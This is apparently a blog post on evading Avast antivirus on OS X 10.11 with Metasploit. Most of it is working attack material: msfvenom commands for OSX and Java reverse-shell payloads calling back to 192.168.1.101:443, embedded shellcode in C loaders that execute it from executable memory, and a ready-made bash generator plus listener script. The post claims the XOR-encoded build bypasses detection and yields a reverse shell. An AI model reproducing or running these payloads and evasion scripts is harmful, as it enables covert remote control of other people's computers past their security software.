Lets see how good some of the Antivirus products are nowdays on a modern OSX system. Simply googling the OSX antivirus ; the first hit I get is Avast Free Mac Security. So the first part of the testing runs will be on OSX 10.11.4 El Captain and Avast 12.7
Installation is pretty straight forward, so lest see how is Metasploit holding against it.
Lets try a simple OSX binary payload on our Linux machine with metasploit framework installed
# ./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test.osx # ./msfvenom -p osx/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f macho > test64.osx
test.osx and test64.osx get detected immediately on the SMB share
Now lets see our luck with Java jar payload
# ./msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 > test.jar
Gets detected upon execution of test.jar on the OSX (need Java JDK for this)
So our old tricks don’t work anymore ..
So we need to try to be smarter and use some customization …
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f macho > newtest.64.osx
newest.64.osx gets detected immediately on the SMB share
So we will need to compile our own code to bypass Avast
Goto hpc.sourceforge.net and download gcc7.1 to try and build some OSX 10.11 binaries
Thats pretty standard once the gcc7.1.tar is downloaded you need to extract it to /usr on OSX and let Xcode console stuff install.
Lets try some custom C code
./msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.1.101 LPORT=443 -f c > shellcode.c
And paste the shellcode.c to the template
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"\x68\xc0\xa8\x01\x65\x68\xff\x02\x01\xbb\x89\xe7\x31\xc0\x50"
"\x6a\x01\x6a\x02\x6a\x10\xb0\x61\xcd\x80\x57\x50\x50\x6a\x62"
"\x58\xcd\x80\x50\x6a\x5a\x58\xcd\x80\xff\x4f\xe8\x79\xf6\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x54\x53"
"\x50\xb0\x3b\xcd\x80";
main()
{
int (*ret)() = (int(*)())code;
ret();
}
Copy the code to the OSX and compile
$ gcc test.c - o test.osx
Gets picked up by Avast immediately during compilation
So lets see what encoders/payloads we have in msfvenom that can be used for OSX
$ ./msfconsole --list
x64/xor normal XOR Encoder
x64/zutto_dekiru manual Zutto Dekiru
osx/x64/dupandexecve/bind_tcp dup2 socket in edi, then execve. Listen, read length, read buffer, execute
osx/x64/dupandexecve/reverse_tcp dup2 socket in edi, then execve. Connect, read length, read buffer, executeosx/
osx/x64/shell_bind_tcp Bind an arbitrary command to an arbitrary port
osx/x64/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)
osx/x64/shell_reverse_tcp Connect back to attacker and spawn a command shell
So lets try one more custom code
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=192.168.1.101 LPORT=443 -a x64 --platform OSX -e x64/xor -f c -o test.c
Add the test.c shellcode to this template
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <unistd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>
unsigned char buf[] =
"\x48\x31\xc9\x48\x81\xe9\xf2\xff\xff\xff\x48\x8d\x05\xef\xff"
"\xff\xff\x48\xbb\xe6\x84\xaf\xdf\x92\x78\x92\x7c\x48\x31\x58"
"\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\x5e\xe5\xaf\xdf\x90\x12"
"\x90\x23\x8c\x85\xf1\x97\xa3\xaa\x9d\x79\xaf\x0d\x6b\x97\x1b"
"\xbf\x2a\x1e\xe6\x84\xad\x97\xa3\x8e\xc4\x34\x58\x84\xad\xde"
"\x29\xb8\x3a\x7d\x83\xd2\xe7\x56\x74\x12\x82\x26\xe9\x81\xe3"
"\x56\x75\xc0\xc8\x7c\xe6\x86\xe7\xee\x64\x77\x97\xc4\xbc\x84"
"\xaf\xdd\xda\x87\x54\x73\xe3\xcc\x9e\x1f\x2a\x43\x92\x7c\xe4"
"\x6c\xa7\xdf\x92\x78\xbd\x1e\x8f\xea\x80\xac\xfa\x78\xda\xf7"
"\xda\xa0\xe7\xee\x40\x2a\xc5\x34\x6f\x62\xa0\xda\x92\x78\x92"
"\x7c";
int main(int argc, char **argv)
{
void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
printf("ret: 0x%x",ptr);
memcpy(ptr,buf,sizeof buf);
void (*fp)() = (void (*)())ptr;
fp();
}
On OSX compile the code va GCC
$ gcc newtest.c -o newtest.osx $ ./newtest.osx
This one works well and we can bypass Avast on OSX and get a reverse shell,
Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh
Update: I had a bug here; forgot to incude the $port and $IP variables :) – fixed
#!/bin/bash
clear
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi
echo '[*] Cleaning up '
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c
echo '#include <stdint.h>' >> temp.c
echo '' >> temp.c
cat test.c >> temp.c
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
echo '[-] Something went wrong .. '
exit 0
fi
And the listener LISTENER-MAC-LATEST.sh
#!/bin/bash clear echo "***************************************************************" echo " Automatic shellcode generator - FOR METASPLOIT " echo " For Automatic Teensy programming and deployment " echo "***************************************************************" echo -e "What IP are we gonna listen to ? \c" read host echo -e "What Port Number are we gonna listen to? : \c" read port echo "Starting the meterpreter listener.." echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh echo -n $host >> run.listener.sh echo -n '; set LPORT ' >> run.listener.sh echo -n $port >> run.listener.sh echo -n '; run"' >> run.listener.sh chmod +x run.listener.sh ./run.listener.sh
Video
https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/
